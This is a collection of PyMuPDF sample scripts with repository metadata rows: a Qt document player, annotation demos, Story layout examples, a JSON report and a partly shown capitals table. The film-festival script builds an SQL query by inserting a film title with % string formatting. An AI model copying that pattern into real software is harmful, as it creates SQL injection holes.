from PyQt6 import QtGui, QtWidgets, QtCore
from PyQt6.QtCore import pyqtSignal as Signal, pyqtSlot as Slot
wrapper = "PyQt6"
elif module_exists("PySide6"):
# PySide6
from PySide6 import QtGui, QtWidgets, QtCore
from PySide6.QtCore import Signal, Slot
wrapper = "PySide6"
my_timer = time.clock if str is bytes else time.perf_counter
class DocForm(QtWidgets.QWidget):
def __init__(self):
super().__init__()
self.process = None
self.queNum = mp.Queue()
self.queDoc = mp.Queue()
self.page_count = 0
self.curPageNum = 0
self.lastDir = ""
self.timerSend = QtCore.QTimer(self)
self.timerSend.timeout.connect(self.onTimerSendPageNum)
self.timerGet = QtCore.QTimer(self)
self.timerGet.timeout.connect(self.onTimerGetPage)
self.timerWaiting = QtCore.QTimer(self)
self.timerWaiting.timeout.connect(self.onTimerWaiting)
self.initUI()
def initUI(self):
vbox = QtWidgets.QVBoxLayout()
self.setLayout(vbox)
hbox = QtWidgets.QHBoxLayout()
self.btnOpen = QtWidgets.QPushButton("OpenDocument", self)
self.btnOpen.clicked.connect(self.openDoc)
hbox.addWidget(self.btnOpen)
self.btnPlay = QtWidgets.QPushButton("PlayDocument", self)
self.btnPlay.clicked.connect(self.playDoc)
hbox.addWidget(self.btnPlay)
self.btnStop = QtWidgets.QPushButton("Stop", self)
self.btnStop.clicked.connect(self.stopPlay)
hbox.addWidget(self.btnStop)
self.label = QtWidgets.QLabel("0/0", self)
self.label.setFont(QtGui.QFont("Verdana", 20))
hbox.addWidget(self.label)
vbox.addLayout(hbox)
self.labelImg = QtWidgets.QLabel("Document", self)
sizePolicy = QtWidgets.QSizePolicy(
QtWidgets.QSizePolicy.Policy.Preferred, QtWidgets.QSizePolicy.Policy.Expanding
)
self.labelImg.setSizePolicy(sizePolicy)
vbox.addWidget(self.labelImg)
self.setGeometry(100, 100, 400, 600)
self.setWindowTitle("PyMuPDF Document Player")
self.show()
def openDoc(self):
path, _ = QtWidgets.QFileDialog.getOpenFileName(
self,
"Open Document",
self.lastDir,
"All Supported Files (*.pdf;*.epub;*.xps;*.oxps;*.cbz;*.fb2);;PDF Files (*.pdf);;EPUB Files (*.epub);;XPS Files (*.xps);;OpenXPS Files (*.oxps);;CBZ Files (*.cbz);;FB2 Files (*.fb2)",
#options=QtWidgets.QFileDialog.Options(),
)
if path:
self.lastDir, self.file = os.path.split(path)
if self.process:
self.queNum.put(-1) # use -1 to notify the process to exit
self.timerSend.stop()
self.curPageNum = 0
self.page_count = 0
self.process = mp.Process(
target=openDocInProcess, args=(path, self.queNum, self.queDoc)
)
self.process.start()
self.timerGet.start(40)
self.label.setText("0/0")
self.queNum.put(0)
self.startTime = time.perf_counter()
self.timerWaiting.start(40)
def playDoc(self):
self.timerSend.start(500)
def stopPlay(self):
self.timerSend.stop()
def onTimerSendPageNum(self):
if self.curPageNum < self.page_count - 1:
self.queNum.put(self.curPageNum + 1)
else:
self.timerSend.stop()
def onTimerGetPage(self):
try:
ret = self.queDoc.get(False)
if isinstance(ret, int):
self.timerWaiting.stop()
self.page_count = ret
self.label.setText("{}/{}".format(self.curPageNum + 1, self.page_count))
else: # tuple, pixmap info
num, samples, width, height, stride, alpha = ret
self.curPageNum = num
self.label.setText("{}/{}".format(self.curPageNum + 1, self.page_count))
fmt = (
QtGui.QImage.Format.Format_RGBA8888
if alpha
else QtGui.QImage.Format.Format_RGB888
)
qimg = QtGui.QImage(samples, width, height, stride, fmt)
self.labelImg.setPixmap(QtGui.QPixmap.fromImage(qimg))
except queue.Empty as ex:
pass
def onTimerWaiting(self):
self.labelImg.setText(
'Loading "{}", {:.2f}s'.format(
self.file, time.perf_counter() - self.startTime
)
)
def closeEvent(self, event):
self.queNum.put(-1)
event.accept()
def openDocInProcess(path, queNum, quePageInfo):
start = my_timer()
doc = pymupdf.open(path)
end = my_timer()
quePageInfo.put(doc.page_count)
while True:
num = queNum.get()
if num < 0:
break
page = doc.load_page(num)
pix = page.get_pixmap()
quePageInfo.put(
(num, pix.samples, pix.width, pix.height, pix.stride, pix.alpha)
)
doc.close()
print("process exit")
if __name__ == "__main__":
app = QtWidgets.QApplication(sys.argv)
form = DocForm()
sys.exit(app.exec())
| 6,215 | Python | .py | 160 | 30.18125 | 195 | 0.620581 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,308 | annotations-ink.py | pymupdf_PyMuPDF/docs/samples/annotations-ink.py | import math
import pymupdf
#------------------------------------------------------------------------------
# preliminary stuff: create function value lists for sine and cosine
#------------------------------------------------------------------------------
w360 = math.pi * 2 # go through full circle
deg = w360 / 360 # 1 degree as radians
rect = pymupdf.Rect(100,200, 300, 300) # use this rectangle
first_x = rect.x0 # x starts from left
first_y = rect.y0 + rect.height / 2. # rect middle means y = 0
x_step = rect.width / 360 # rect width means 360 degrees
y_scale = rect.height / 2. # rect height means 2
sin_points = [] # sine values go here
cos_points = [] # cosine values go here
for x in range(362): # now fill in the values
x_coord = x * x_step + first_x # current x coordinate
y = -math.sin(x * deg) # sine
p = (x_coord, y * y_scale + first_y) # corresponding point
sin_points.append(p) # append
y = -math.cos(x * deg) # cosine
p = (x_coord, y * y_scale + first_y) # corresponding point
cos_points.append(p) # append
#------------------------------------------------------------------------------
# create the document with one page
#------------------------------------------------------------------------------
doc = pymupdf.open() # make new PDF
page = doc.new_page() # give it a page
#------------------------------------------------------------------------------
# add the Ink annotation, consisting of 2 curve segments
#------------------------------------------------------------------------------
annot = page.add_ink_annot((sin_points, cos_points))
# let it look a little nicer
annot.set_border(width=0.3, dashes=[1,]) # line thickness, some dashing
annot.set_colors(stroke=(0,0,1)) # make the lines blue
annot.update() # update the appearance
page.draw_rect(rect, width=0.3) # only to demonstrate we did OK
doc.save("a-inktest.pdf")
| 1,907 | Python | .py | 37 | 49.648649 | 79 | 0.514745 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,309 | filmfestival-sql.py | pymupdf_PyMuPDF/docs/samples/filmfestival-sql.py | """
This is a demo script for using PyMuPDF with its "Story" feature.
The following aspects are being covered here:
* The script produces a report of films that are stored in an SQL database
* The report format is provided as a HTML template
The SQL database contains two tables:
1. Table "films" which has the columns "title" (film title, str), "director"
(str) and "year" (year of release, int).
2. Table "actors" which has the columns "name" (actor name, str) and "title"
(the film title where the actor had been casted, str).
The script reads all content of the "films" table. For each film title it
reads all rows from table "actors" which took part in that film.
Comment 1
---------
To keep things easy and free from pesky technical detail, the relevant file
names inherit the name of this script:
- the database's filename is the script name with ".py" extension replaced
by ".db".
- the output PDF similarly has script file name with extension ".pdf".
Comment 2
---------
The SQLITE database has been created using https://sqlitebrowser.org/, a free
multi-platform tool to maintain or manipulate SQLITE databases.
"""
import os
import sqlite3
import pymupdf
# ----------------------------------------------------------------------
# HTML template for the film report
# There are four placeholders coded as "id" attributes.
# One "id" allows locating the template part itself, the other three
# indicate where database text should be inserted.
# ----------------------------------------------------------------------
festival_template = (
"<html><head><title>Just some arbitrary text</title></head>"
'<body><h1 style="text-align:center">Hook Norton Film Festival</h1>'
"<ol>"
'<li id="filmtemplate">'
'<b id="filmtitle"></b>'
"<dl>"
'<dt>Director<dd id="director">'
'<dt>Release Year<dd id="filmyear">'
'<dt>Cast<dd id="cast">'
"</dl>"
"</li>"
"</ol>"
"</body></html"
)
# -------------------------------------------------------------------
# define database access
# -------------------------------------------------------------------
dbfilename = __file__.replace(".py", ".db") # the SQLITE database file name
assert os.path.isfile(dbfilename), f'{dbfilename}'
database = sqlite3.connect(dbfilename) # open database
cursor_films = database.cursor() # cursor for selecting the films
cursor_casts = database.cursor() # cursor for selecting actors per film
# select statement for the films - let SQL also sort it for us
select_films = """SELECT title, director, year FROM films ORDER BY title"""
# select stament for actors, a skeleton: sub-select by film title
select_casts = """SELECT name FROM actors WHERE film = "%s" ORDER BY name"""
# -------------------------------------------------------------------
# define the HTML Story and fill it with database data
# -------------------------------------------------------------------
story = pymupdf.Story(festival_template)
body = story.body # access the HTML body detail
template = body.find(None, "id", "filmtemplate") # find the template part
# read the films from the database and put them all in one Python list
# NOTE: instead we might fetch rows one by one (advisable for large volumes)
cursor_films.execute(select_films) # execute cursor, and ...
films = cursor_films.fetchall() # read out what was found
for title, director, year in films: # iterate through the films
film = template.clone() # clone template to report each film
film.find(None, "id", "filmtitle").add_text(title) # put title in templ
film.find(None, "id", "director").add_text(director) # put director
film.find(None, "id", "filmyear").add_text(str(year)) # put year
# the actors reside in their own table - find the ones for this film title
cursor_casts.execute(select_casts % title) # execute cursor
casts = cursor_casts.fetchall() # read actors for the film
# each actor name appears in its own tuple, so extract it from there
film.find(None, "id", "cast").add_text("\n".join([c[0] for c in casts]))
body.append_child(film)
template.remove() # remove the template
# -------------------------------------------------------------------
# generate the PDF
# -------------------------------------------------------------------
writer = pymupdf.DocumentWriter(__file__.replace(".py", ".pdf"), "compress")
mediabox = pymupdf.paper_rect("a4") # use pages in ISO-A4 format
where = mediabox + (72, 36, -36, -72) # leave page borders
more = 1 # end of output indicator
while more:
dev = writer.begin_page(mediabox) # make a new page
more, filled = story.place(where) # arrange content for this page
story.draw(dev, None) # write content to page
writer.end_page() # finish the page
writer.close() # close the PDF
| 4,797 | Python | .py | 95 | 48.063158 | 78 | 0.634985 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,310 | new-annots.py | pymupdf_PyMuPDF/docs/samples/new-annots.py | # -*- coding: utf-8 -*-
"""
-------------------------------------------------------------------------------
Demo script showing how annotations can be added to a PDF using PyMuPDF.
It contains the following annotation types:
Caret, Text, FreeText, text markers (underline, strike-out, highlight,
squiggle), Circle, Square, Line, PolyLine, Polygon, FileAttachment, Stamp
and Redaction.
There is some effort to vary appearances by adding colors, line ends,
opacity, rotation, dashed lines, etc.
Dependencies
------------
PyMuPDF v1.17.0
-------------------------------------------------------------------------------
"""
from __future__ import print_function
import gc
import sys
import pymupdf
print(pymupdf.__doc__)
if pymupdf.VersionBind.split(".") < ["1", "17", "0"]:
sys.exit("PyMuPDF v1.17.0+ is needed.")
gc.set_debug(gc.DEBUG_UNCOLLECTABLE)
highlight = "this text is highlighted"
underline = "this text is underlined"
strikeout = "this text is striked out"
squiggled = "this text is zigzag-underlined"
red = (1, 0, 0)
blue = (0, 0, 1)
gold = (1, 1, 0)
green = (0, 1, 0)
displ = pymupdf.Rect(0, 50, 0, 50)
r = pymupdf.Rect(72, 72, 220, 100)
t1 = u"têxt üsès Lätiñ charß,\nEUR: €, mu: µ, super scripts: ²³!"
def print_descr(annot):
"""Print a short description to the right of each annot rect."""
annot.parent.insert_text(
annot.rect.br + (10, -5), "%s annotation" % annot.type[1], color=red
)
doc = pymupdf.open()
page = doc.new_page()
page.set_rotation(0)
annot = page.add_caret_annot(r.tl)
print_descr(annot)
r = r + displ
annot = page.add_freetext_annot(
r,
t1,
fontsize=10,
rotate=90,
text_color=blue,
fill_color=gold,
align=pymupdf.TEXT_ALIGN_CENTER,
)
annot.set_border(width=0.3, dashes=[2])
annot.update(text_color=blue, fill_color=gold)
print_descr(annot)
r = annot.rect + displ
annot = page.add_text_annot(r.tl, t1)
print_descr(annot)
# Adding text marker annotations:
# first insert a unique text, then search for it, then mark it
pos = annot.rect.tl + displ.tl
page.insert_text(
pos, # insertion point
highlight, # inserted text
morph=(pos, pymupdf.Matrix(-5)), # rotate around insertion point
)
rl = page.search_for(highlight, quads=True) # need a quad b/o tilted text
annot = page.add_highlight_annot(rl[0])
print_descr(annot)
pos = annot.rect.bl # next insertion point
page.insert_text(pos, underline, morph=(pos, pymupdf.Matrix(-10)))
rl = page.search_for(underline, quads=True)
annot = page.add_underline_annot(rl[0])
print_descr(annot)
pos = annot.rect.bl
page.insert_text(pos, strikeout, morph=(pos, pymupdf.Matrix(-15)))
rl = page.search_for(strikeout, quads=True)
annot = page.add_strikeout_annot(rl[0])
print_descr(annot)
pos = annot.rect.bl
page.insert_text(pos, squiggled, morph=(pos, pymupdf.Matrix(-20)))
rl = page.search_for(squiggled, quads=True)
annot = page.add_squiggly_annot(rl[0])
print_descr(annot)
pos = annot.rect.bl
r = pymupdf.Rect(pos, pos.x + 75, pos.y + 35) + (0, 20, 0, 20)
annot = page.add_polyline_annot([r.bl, r.tr, r.br, r.tl]) # 'Polyline'
annot.set_border(width=0.3, dashes=[2])
annot.set_colors(stroke=blue, fill=green)
annot.set_line_ends(pymupdf.PDF_ANNOT_LE_CLOSED_ARROW, pymupdf.PDF_ANNOT_LE_R_CLOSED_ARROW)
annot.update(fill_color=(1, 1, 0))
print_descr(annot)
r += displ
annot = page.add_polygon_annot([r.bl, r.tr, r.br, r.tl]) # 'Polygon'
annot.set_border(width=0.3, dashes=[2])
annot.set_colors(stroke=blue, fill=gold)
annot.set_line_ends(pymupdf.PDF_ANNOT_LE_DIAMOND, pymupdf.PDF_ANNOT_LE_CIRCLE)
annot.update()
print_descr(annot)
r += displ
annot = page.add_line_annot(r.tr, r.bl) # 'Line'
annot.set_border(width=0.3, dashes=[2])
annot.set_colors(stroke=blue, fill=gold)
annot.set_line_ends(pymupdf.PDF_ANNOT_LE_DIAMOND, pymupdf.PDF_ANNOT_LE_CIRCLE)
annot.update()
print_descr(annot)
r += displ
annot = page.add_rect_annot(r) # 'Square'
annot.set_border(width=1, dashes=[1, 2])
annot.set_colors(stroke=blue, fill=gold)
annot.update(opacity=0.5)
print_descr(annot)
r += displ
annot = page.add_circle_annot(r) # 'Circle'
annot.set_border(width=0.3, dashes=[2])
annot.set_colors(stroke=blue, fill=gold)
annot.update()
print_descr(annot)
r += displ
annot = page.add_file_annot(
r.tl, b"just anything for testing", "testdata.txt" # 'FileAttachment'
)
print_descr(annot) # annot.rect
r += displ
annot = page.add_stamp_annot(r, stamp=10) # 'Stamp'
annot.set_colors(stroke=green)
annot.update()
print_descr(annot)
r += displ + (0, 0, 50, 10)
rc = page.insert_textbox(
r,
"This content will be removed upon applying the redaction.",
color=blue,
align=pymupdf.TEXT_ALIGN_CENTER,
)
annot = page.add_redact_annot(r)
print_descr(annot)
doc.save(__file__.replace(".py", "-%i.pdf" % page.rotation), deflate=True)
| 4,798 | Python | .py | 140 | 32.385714 | 91 | 0.696622 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,311 | quickfox.py | pymupdf_PyMuPDF/docs/samples/quickfox.py | """
This is a demo script using PyMuPDF's Story class to output text as a PDF with
a two-column page layout.
The script demonstrates the following features:
* How to fill columns or table cells of complex page layouts
* How to embed images
* How to modify existing, given HTML sources for output (text indent, font size)
* How to use fonts defined in package "pymupdf-fonts"
* How to use ZIP files as Archive
--------------
The example is taken from the somewhat modified Wikipedia article
https://en.wikipedia.org/wiki/The_quick_brown_fox_jumps_over_the_lazy_dog.
--------------
"""
import io
import os
import zipfile
import pymupdf
thisdir = os.path.dirname(os.path.abspath(__file__))
myzip = zipfile.ZipFile(os.path.join(thisdir, "quickfox.zip"))
arch = pymupdf.Archive(myzip)
if pymupdf.fitz_fontdescriptors:
# we want to use the Ubuntu fonts for sans-serif and for monospace
CSS = pymupdf.css_for_pymupdf_font("ubuntu", archive=arch, name="sans-serif")
CSS = pymupdf.css_for_pymupdf_font("ubuntm", CSS=CSS, archive=arch, name="monospace")
else:
# No pymupdf-fonts available.
CSS=""
docname = __file__.replace(".py", ".pdf") # output PDF file name
HTML = myzip.read("quickfox.html").decode()
# make the Story object
story = pymupdf.Story(HTML, user_css=CSS, archive=arch)
# --------------------------------------------------------------
# modify the DOM somewhat
# --------------------------------------------------------------
body = story.body # access HTML body
body.set_properties(font="sans-serif") # and give it our font globally
# modify certain nodes
para = body.find("p", None, None) # find relevant nodes (here: paragraphs)
while para != None:
para.set_properties( # method MUST be used for existing nodes
indent=15,
fontsize=13,
)
para = para.find_next("p", None, None)
# choose PDF page size
MEDIABOX = pymupdf.paper_rect("letter")
# text appears only within this subrectangle
WHERE = MEDIABOX + (36, 36, -36, -36)
# --------------------------------------------------------------
# define page layout within the WHERE rectangle
# --------------------------------------------------------------
COLS = 2 # layout: 2 cols 1 row
ROWS = 1
TABLE = pymupdf.make_table(WHERE, cols=COLS, rows=ROWS)
# fill the cells of each page in this sequence:
CELLS = [TABLE[i][j] for i in range(ROWS) for j in range(COLS)]
fileobject = io.BytesIO() # let DocumentWriter write to memory
writer = pymupdf.DocumentWriter(fileobject) # define the writer
more = 1
while more: # loop until all input text has been written out
dev = writer.begin_page(MEDIABOX) # prepare a new output page
for cell in CELLS:
# content may be complete after any cell, ...
if more: # so check this status first
more, _ = story.place(cell)
story.draw(dev)
writer.end_page() # finish the PDF page
writer.close() # close DocumentWriter output
# for housekeeping work re-open from memory
doc = pymupdf.open("pdf", fileobject)
doc.ez_save(docname)
| 3,042 | Python | .py | 72 | 39.625 | 89 | 0.660684 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,312 | json-example.py | pymupdf_PyMuPDF/docs/samples/json-example.py | import pymupdf
import json
my_json = """
[
{
"name" : "Five-storied Pagoda",
"temple" : "Rurikō-ji",
"founded" : "middle Muromachi period, 1442",
"region" : "Yamaguchi, Yamaguchi",
"position" : "34.190181,131.472917"
},
{
"name" : "Founder's Hall",
"temple" : "Eihō-ji",
"founded" : "early Muromachi period",
"region" : "Tajimi, Gifu",
"position" : "35.346144,137.129189"
},
{
"name" : "Fudōdō",
"temple" : "Kongōbu-ji",
"founded" : "early Kamakura period",
"region" : "Kōya, Wakayama",
"position" : "34.213103,135.580397"
},
{
"name" : "Goeidō",
"temple" : "Nishi Honganji",
"founded" : "Edo period, 1636",
"region" : "Kyoto",
"position" : "34.991394,135.751689"
},
{
"name" : "Golden Hall",
"temple" : "Murō-ji",
"founded" : "early Heian period",
"region" : "Uda, Nara",
"position" : "34.536586819357986,136.0395548452301"
},
{
"name" : "Golden Hall",
"temple" : "Fudō-in",
"founded" : "late Muromachi period, 1540",
"region" : "Hiroshima",
"position" : "34.427014,132.471117"
},
{
"name" : "Golden Hall",
"temple" : "Ninna-ji",
"founded" : "Momoyama period, 1613",
"region" : "Kyoto",
"position" : "35.031078,135.713811"
},
{
"name" : "Golden Hall",
"temple" : "Mii-dera",
"founded" : "Momoyama period, 1599",
"region" : "Ōtsu, Shiga",
"position" : "35.013403,135.852861"
},
{
"name" : "Golden Hall",
"temple" : "Tōshōdai-ji",
"founded" : "Nara period, 8th century",
"region" : "Nara, Nara",
"position" : "34.675619,135.784842"
},
{
"name" : "Golden Hall",
"temple" : "Tō-ji",
"founded" : "Momoyama period, 1603",
"region" : "Kyoto",
"position" : "34.980367,135.747686"
},
{
"name" : "Golden Hall",
"temple" : "Tōdai-ji",
"founded" : "middle Edo period, 1705",
"region" : "Nara, Nara",
"position" : "34.688992,135.839822"
},
{
"name" : "Golden Hall",
"temple" : "Hōryū-ji",
"founded" : "Asuka period, by 693",
"region" : "Ikaruga, Nara",
"position" : "34.614317,135.734458"
},
{
"name" : "Golden Hall",
"temple" : "Daigo-ji",
"founded" : "late Heian period",
"region" : "Kyoto",
"position" : "34.951481,135.821747"
},
{
"name" : "Keigū-in Main Hall",
"temple" : "Kōryū-ji",
"founded" : "early Kamakura period, before 1251",
"region" : "Kyoto",
"position" : "35.015028,135.705425"
},
{
"name" : "Konpon-chūdō",
"temple" : "Enryaku-ji",
"founded" : "early Edo period, 1640",
"region" : "Ōtsu, Shiga",
"position" : "35.070456,135.840942"
},
{
"name" : "Korō",
"temple" : "Tōshōdai-ji",
"founded" : "early Kamakura period, 1240",
"region" : "Nara, Nara",
"position" : "34.675847,135.785069"
},
{
"name" : "Kōfūzō",
"temple" : "Hōryū-ji",
"founded" : "early Heian period",
"region" : "Ikaruga, Nara",
"position" : "34.614439,135.735428"
},
{
"name" : "Large Lecture Hall",
"temple" : "Hōryū-ji",
"founded" : "middle Heian period, 990",
"region" : "Ikaruga, Nara",
"position" : "34.614783,135.734175"
},
{
"name" : "Lecture Hall",
"temple" : "Zuiryū-ji",
"founded" : "early Edo period, 1655",
"region" : "Takaoka, Toyama",
"position" : "36.735689,137.010019"
},
{
"name" : "Lecture Hall",
"temple" : "Tōshōdai-ji",
"founded" : "Nara period, 763",
"region" : "Nara, Nara",
"position" : "34.675933,135.784842"
},
{
"name" : "Lotus Flower Gate",
"temple" : "Tō-ji",
"founded" : "early Kamakura period",
"region" : "Kyoto",
"position" : "34.980678,135.746314"
},
{
"name" : "Main Hall",
"temple" : "Akishinodera",
"founded" : "early Kamakura period",
"region" : "Nara, Nara",
"position" : "34.703769,135.776189"
}
]
"""
# the result is a Python dictionary:
my_dict = json.loads(my_json)
MEDIABOX = pymupdf.paper_rect("letter") # output page format: Letter
WHERE = MEDIABOX + (36, 36, -36, -36)
writer = pymupdf.DocumentWriter("json-example.pdf") # create the writer
story = pymupdf.Story()
body = story.body
for i, entry in enumerate(my_dict):
for attribute, value in entry.items():
para = body.add_paragraph()
if attribute == "position":
para.set_fontsize(10)
para.add_link(f"www.google.com/maps/@{value},14z")
else:
para.add_span()
para.set_color("#990000")
para.set_fontsize(14)
para.set_bold()
para.add_text(f"{attribute} ")
para.add_span()
para.set_fontsize(18)
para.add_text(f"{value}")
body.add_horizontal_line()
# This while condition will check a value from the Story `place` method
# for whether all content for the story has been written (0), otherwise
# more content is waiting to be written (1)
more = 1
while more:
device = writer.begin_page(MEDIABOX) # make new page
more, _ = story.place(WHERE)
story.draw(device)
writer.end_page() # finish page
writer.close() # close output file
del story
| 6,789 | Python | .py | 194 | 26.649485 | 72 | 0.44234 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,313 | story-write-stabilized-links.py | pymupdf_PyMuPDF/docs/samples/story-write-stabilized-links.py | """
Demo script for PyMuPDF's `pymupdf.Story.write_stabilized_with_links()`.
`pymupdf.Story.write_stabilized_links()` is similar to
`pymupdf.Story.write_stabilized()` except that it creates a PDF `pymupdf.Document`
that contains PDF links generated from all internal links in the original html.
"""
import textwrap
import pymupdf
def rectfn(rect_num, filled):
'''
We return one rect per page.
'''
rect = pymupdf.Rect(10, 20, 290, 380)
mediabox = pymupdf.Rect(0, 0, 300, 400)
#print(f'rectfn(): rect_num={rect_num} filled={filled}')
return mediabox, rect, None
def contentfn(positions):
'''
Returns html content, with a table of contents derived from `positions`.
'''
ret = ''
ret += textwrap.dedent('''
<!DOCTYPE html>
<body>
<h2>Contents</h2>
<ul>
''')
# Create table of contents with links to all <h1..6> sections in the
# document.
for position in positions:
if position.heading and (position.open_close & 1):
text = position.text if position.text else ''
if position.id:
ret += f" <li><a href=\"#{position.id}\">{text}</a>\n"
else:
ret += f" <li>{text}\n"
ret += f" <ul>\n"
ret += f" <li>page={position.page_num}\n"
ret += f" <li>depth={position.depth}\n"
ret += f" <li>heading={position.heading}\n"
ret += f" <li>id={position.id!r}\n"
ret += f" <li>href={position.href!r}\n"
ret += f" <li>rect={position.rect}\n"
ret += f" <li>text={text!r}\n"
ret += f" <li>open_close={position.open_close}\n"
ret += f" </ul>\n"
ret += '</ul>\n'
# Main content.
ret += textwrap.dedent(f'''
<h1>First section</h1>
<p>Contents of first section.
<ul>
<li>External <a href="https://artifex.com/">link to https://artifex.com/</a>.
<li><a href="#idtest">Link to IDTEST</a>.
<li><a href="#nametest">Link to NAMETEST</a>.
</ul>
<h1>Second section</h1>
<p>Contents of second section.
<h2>Second section first subsection</h2>
<p>Contents of second section first subsection.
<p id="idtest">IDTEST
<h1>Third section</h1>
<p>Contents of third section.
<p><a name="nametest">NAMETEST</a>.
</body>
''')
ret = ret.strip()
with open(__file__.replace('.py', '.html'), 'w') as f:
f.write(ret)
return ret;
out_path = __file__.replace('.py', '.pdf')
document = pymupdf.Story.write_stabilized_with_links(contentfn, rectfn)
document.save(out_path)
| 2,923 | Python | .py | 73 | 30.369863 | 89 | 0.540628 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,314 | story-write-stabilized.py | pymupdf_PyMuPDF/docs/samples/story-write-stabilized.py | """
Demo script for PyMuPDF's `pymupdf.Story.write_stabilized()`.
`pymupdf.Story.write_stabilized()` is similar to `pymupdf.Story.write()`,
except instead of taking a fixed html document, it does iterative layout
of dynamically-generated html content (provided by a callback) to a
`pymupdf.DocumentWriter`.
For example this allows one to add a dynamically-generated table of contents
section while ensuring that page numbers are patched up until stable.
"""
import textwrap
import pymupdf
def rectfn(rect_num, filled):
'''
We return one rect per page.
'''
rect = pymupdf.Rect(10, 20, 290, 380)
mediabox = pymupdf.Rect(0, 0, 300, 400)
#print(f'rectfn(): rect_num={rect_num} filled={filled}')
return mediabox, rect, None
def contentfn(positions):
'''
Returns html content, with a table of contents derived from `positions`.
'''
ret = ''
ret += textwrap.dedent('''
<!DOCTYPE html>
<body>
<h2>Contents</h2>
<ul>
''')
# Create table of contents with links to all <h1..6> sections in the
# document.
for position in positions:
if position.heading and (position.open_close & 1):
text = position.text if position.text else ''
if position.id:
ret += f" <li><a href=\"#{position.id}\">{text}</a>\n"
else:
ret += f" <li>{text}\n"
ret += f" <ul>\n"
ret += f" <li>page={position.page_num}\n"
ret += f" <li>depth={position.depth}\n"
ret += f" <li>heading={position.heading}\n"
ret += f" <li>id={position.id!r}\n"
ret += f" <li>href={position.href!r}\n"
ret += f" <li>rect={position.rect}\n"
ret += f" <li>text={text!r}\n"
ret += f" <li>open_close={position.open_close}\n"
ret += f" </ul>\n"
ret += '</ul>\n'
# Main content.
ret += textwrap.dedent(f'''
<h1>First section</h1>
<p>Contents of first section.
<h1>Second section</h1>
<p>Contents of second section.
<h2>Second section first subsection</h2>
<p>Contents of second section first subsection.
<h1>Third section</h1>
<p>Contents of third section.
</body>
''')
ret = ret.strip()
with open(__file__.replace('.py', '.html'), 'w') as f:
f.write(ret)
return ret;
out_path = __file__.replace('.py', '.pdf')
writer = pymupdf.DocumentWriter(out_path)
pymupdf.Story.write_stabilized(writer, contentfn, rectfn)
writer.close()
| 2,783 | Python | .py | 70 | 30.9 | 76 | 0.567085 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,315 | national-capitals.py | pymupdf_PyMuPDF/docs/samples/national-capitals.py | """
Demo script using (Py-) MuPDF "Story" feature.
The following features are implemented:
* Use of Story "template" feature to provide row content
* Use database access (SQLITE) to fetch row content
* Use ElementPosition feature to locate cell positions on page
* Simulate feature "Table Header Repeat"
* Simulate feature "Cell Grid Lines"
"""
import io
import sqlite3
import sys
import pymupdf
"""
Table data. Used to populate a temporary SQL database, which will be processed by the script.
Its only purpose is to avoid carrying around a separate database file.
"""
table_data = """China;Beijing;21542000;1.5%;2018
Japan;Tokyo;13921000;11.2%;2019
DR Congo;Kinshasa;12691000;13.2%;2017
Russia;Moscow;12655050;8.7%;2021
Indonesia;Jakarta;10562088;3.9%;2020
Egypt;Cairo;10107125;9.3%;2022
South Korea;Seoul;9508451;18.3%;2022
Mexico;Mexico City;9209944;7.3%;2020
United Kingdom;London;9002488;13.4%;2020
Bangladesh;Dhaka;8906039;5.3%;2011
Peru;Lima;8852000;26.3%;2012
Iran;Tehran;8693706;9.9%;2016
Thailand;Bangkok;8305218;11.6%;2010
Vietnam;Hanoi;8053663;8.3%;2019
Iraq;Baghdad;7682136;17.6%;2021
Saudi Arabia;Riyadh;7676654;21.4%;2018
Hong Kong;Hong Kong;7291600;100%;2022
Colombia;Bogotá;7181469;13.9%;2011
Chile;Santiago;6310000;32.4%;2012
Turkey;Ankara;5747325;6.8%;2021
Singapore;Singapore;5453600;91.8%;2021
Afghanistan;Kabul;4601789;11.5%;2021
Kenya;Nairobi;4397073;8.3%;2019
Jordan;Amman;4061150;36.4%;2021
Algeria;Algiers;3915811;8.9%;2011
Germany;Berlin;3677472;4.4%;2021
Spain;Madrid;3305408;7.0%;2021
Ethiopia;Addis Ababa;3040740;2.5%;2012
Kuwait;Kuwait City;2989000;70.3%;2018
Guatemala;Guatemala City;2934841;16.7%;2020
South Africa;Pretoria;2921488;4.9%;2011
Ukraine;Kyiv;2920873;6.7%;2021
Argentina;Buenos Aires;2891082;6.4%;2010
North Korea;Pyongyang;2870000;11.1%;2016
Uzbekistan;Tashkent;2860600;8.4%;2022
Italy;Rome;2761632;4.7%;2022
Ecuador;Quito;2800388;15.7%;2020
Cameroon;Yaoundé;2765568;10.2%;2015
Zambia;Lusaka;2731696;14.0%;2020
Sudan;Khartoum;2682431;5.9%;2012
Brazil;Brasília;2648532;1.2%;2012
Taiwan;Taipei (de facto);2608332;10.9%;2020
Yemen;Sanaa;2575347;7.8%;2012
Angola;Luanda;2571861;7.5%;2020
Burkina Faso;Ouagadougou;2453496;11.1%;2019
Ghana;Accra;2388000;7.3%;2017
Somalia;Mogadishu;2388000;14.0%;2021
Azerbaijan;Baku;2303100;22.3%;2022
Cambodia;Phnom Penh;2281951;13.8%;2019
Venezuela;Caracas;2245744;8.0%;2016
France;Paris;2139907;3.3%;2022
Cuba;Havana;2132183;18.9%;2020
Zimbabwe;Harare;2123132;13.3%;2012
Syria;Damascus;2079000;9.7%;2019
Belarus;Minsk;1996553;20.8%;2022
Austria;Vienna;1962779;22.0%;2022
Poland;Warsaw;1863056;4.9%;2021
Philippines;Manila;1846513;1.6%;2020
Mali;Bamako;1809106;8.3%;2009
